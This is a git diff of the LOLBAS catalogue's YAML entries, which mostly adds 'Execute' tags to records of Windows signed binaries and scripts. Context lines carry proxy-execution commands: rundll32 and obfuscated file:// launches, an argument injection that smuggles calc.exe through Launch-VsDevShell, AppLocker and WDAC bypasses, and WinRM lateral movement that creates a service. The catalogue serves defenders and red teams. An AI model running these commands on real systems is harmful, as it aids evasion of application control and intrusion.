b/yml/OSLibraries/Ieadvpack.yml index 5b74564..bda0f4c 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: INF - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: INF - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. @@ -34,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. @@ -41,6 +47,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 5bcb8b4..e75c0a6 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: URL Full_Path: - Path: c:\windows\system32\ieframe.dll - Path: c:\windows\syswow64\ieframe.dll diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 576dd09..a7701fe 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: HTA Full_Path: - Path: c:\windows\system32\mshtml.dll - Path: c:\windows\syswow64\mshtml.dll diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 61fd919..407d41c 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\pcwutl.dll - Path: c:\windows\syswow64\pcwutl.dll diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index e5b6ccc..b6836b6 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. Usecase: Load an executable payload. @@ -21,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows Tags: - - Input: INF + - Execute: INF Full_Path: - Path: c:\windows\system32\setupapi.dll - Path: c:\windows\syswow64\setupapi.dll diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index e7ab9a0..52e973e 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: URL Full_Path: - Path: c:\windows\system32\shdocvw.dll - Path: c:\windows\syswow64\shdocvw.dll diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 97e10ab..4848867 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -20,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Description: Launch command line by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. @@ -27,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index ac5cce2..3b01659 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Usecase: Load an executable payload. @@ -21,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF Full_Path: - Path: c:\windows\system32\syssetup.dll - Path: c:\windows\syswow64\syssetup.dll diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 8e7a070..608f69d 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: HTA - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. Usecase: Load an executable payload by calling a .url file with or without quotes. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: URL - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe Description: Launch an executable by calling FileProtocolHandler. Usecase: Launch an executable. @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling FileProtocolHandler. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). @@ -39,6 +47,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta Description: Launch a HTML application payload by calling FileProtocolHandler. Usecase: Invoke an HTML Application via mshta.exe (Default Handler). @@ -46,6 +56,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: HTA Full_Path: - Path: c:\windows\system32\url.dll - Path: c:\windows\syswow64\url.dll diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index e107b5e..a7c1355 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable payload by calling RouteTheCall (obfuscated). Usecase: Launch an executable. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\zipfldr.dll - Path: c:\windows\syswow64\zipfldr.dll diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 4298de4..a57f1b9 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - - Execute: DLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 Code_Sample: diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 37099e5..b23da74 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10 + Tags: + - Execute: PowerShell Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index c7b884d..963cf0b 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 diff --git a/yml/OSScripts/Launch-VsDevShell.yml b/yml/OSScripts/Launch-VsDevShell.yml index d5bb9b2..72d32fb 100644 --- a/yml/OSScripts/Launch-VsDevShell.yml +++ b/yml/OSScripts/Launch-VsDevShell.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; calc.exe ;"' Description: Execute binaries and commands from the context of the signed script using the "VsInstallationPath" flag. Usecase: Proxy execution @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1 - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1 diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index cf3c4b7..4b1441c 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. Usecase: Proxy execution from script @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\manage-bde.wsf Code_Sample: diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index d913b86..18985ac 100644 --- a/yml/OSScripts/Pubprn.yml +++ b/yml/OSScripts/Pubprn.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216.001 OperatingSystem: Windows 10 + Tags: + - Execute: SCT Full_Path: - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index 64ef7b9..7f71efb 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216.002 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: PowerShell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs Detection: diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 26109da..cb86feb 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - - Execute: DLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 Code_Sample: diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index ecfee7e..7e375cc 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: Remote - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Usecase: Proxy execution @@ -18,6 +21,9 @@ Commands: Privileges: Admin MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: Remote - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe. Usecase: Execute arbitrary, unsigned code via XSL script @@ -25,6 +31,8 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: XSL Full_Path: - Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 237afa9..c8b1d9f 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: Pester.bat ;calc.exe Description: Execute code using Pester. Example here executes calc.exe Usecase: Proxy execution @@ -18,13 +20,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 - - Command: Pester.bat ;calc.exe - Description: Execute code using Pester. Example here executes calc.exe - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\\bin\Pester.bat Code_Sample: diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml index be527da..23154c1 100644 --- a/yml/OtherMSBinaries/AccCheckConsole.yml +++ b/yml/OtherMSBinaries/AccCheckConsole.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: DLL + - Execute: DLL (.NET) - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code to bypass AppLocker. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: DLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index 006c8b4..142ad7a 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -18,6 +18,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: All Windows + Tags: + - Execute: CMD - Command: adplus.exe -c config-adplus.xml Description: Dump process memory using adplus config file (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary @@ -32,6 +34,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: All windows + Tags: + - Execute: CMD + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index 8bb87dc..5e95bac 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 + Tags: + - Execute: PowerShell - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1 Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully Usecase: Execute a provided EXE @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Appcert.yml b/yml/OtherMSBinaries/Appcert.yml index 30b817b..a423ff3 100644 --- a/yml/OtherMSBinaries/Appcert.yml +++ b/yml/OtherMSBinaries/Appcert.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process. Usecase: Execute custom made MSI file with malicious code @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1218.007 OperatingSystem: Windows + Tags: + - Execute: MSI Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\App Certification Kit\appcert.exe - Path: C:\Program Files\Windows Kits\10\App Certification Kit\appcert.exe diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index 54678db..620916d 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 + Tags: + - Execute: CMD - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 + Tags: + - Execute: EXE - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index 386361e..c61401a 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml @@ -49,6 +49,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH + - Execute: Remote - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. @@ -58,6 +59,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH + - Execute: Remote Full_Path: - Path: no default Detection: diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 290e847..87aa504 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: Shellcode - Command: | cdb.exe -pd -pn .shell @@ -20,6 +22,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CMD - Command: cdb.exe -c C:\debug-script.txt calc Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary @@ -27,6 +31,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml index b2fb1f7..7bbacc2 100644 --- a/yml/OtherMSBinaries/Coregen.yml +++ b/yml/OtherMSBinaries/Coregen.yml @@ -20,6 +20,8 @@ Commands: Privileges: User MitreID: T1055 OperatingSystem: Windows + Tags: + - Execute: DLL - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions. Usecase: Execute DLL code diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 991c1bd..2a15866 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CSharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index a63da15..a72e4b6 100644 --- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Devinit.yml b/yml/OtherMSBinaries/Devinit.yml index 2ed83b4..e02a700 100644 --- a/yml/OtherMSBinaries/Devinit.yml +++ b/yml/OtherMSBinaries/Devinit.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: MSI + - Execute: Remote Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\Tools\devinit\devinit.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\Tools\devinit\devinit.exe diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index 2a67dc6..f6f9eea 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed + Tags: + - Execute: CMD - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed + Tags: + - Execute: CMD Full_Path: - Path: 'c:\windows\system32\devtoolslauncher.exe' Code_Sample: diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index 44a00cd..f54457e 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CSharp Full_Path: - Path: no default Code_Sample: diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 39b59be..16b369e 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed + Tags: + - Execute: DLL (.NET) - Command: dotnet.exe [PATH_TO_DLL] Description: dotnet.exe will execute any DLL. Usecase: Execute DLL @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed + Tags: + - Execute: DLL (.NET) - Command: dotnet.exe fsi Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands Usecase: Execute arbitrary F# code @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 and up with .NET SDK installed + Tags: + - Execute: FSharp - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code Usecase: Execute code bypassing AWL @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 and up with .NET Core installed + Tags: + - Execute: CSharp Full_Path: - Path: 'C:\Program Files\dotnet\dotnet.exe' Detection: diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index 72b0145..05ac2aa 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\dxcap.exe - Path: C:\Windows\SysWOW64\dxcap.exe diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index fb18323..6058ea5 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: FSharp - Command: fsi.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: FSharp Full_Path: - Path: C:\Program Files\dotnet\sdk\\FSharp\fsi.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 5b55e35..4241cbe 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: FSharp - Command: fsianycpu.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: FSharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index 09c960a..c564efa 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: Mftrace.exe powershell.exe Description: Launch cmd.exe as a subprocess of Mftrace.exe. Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86\mftrace.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe diff --git 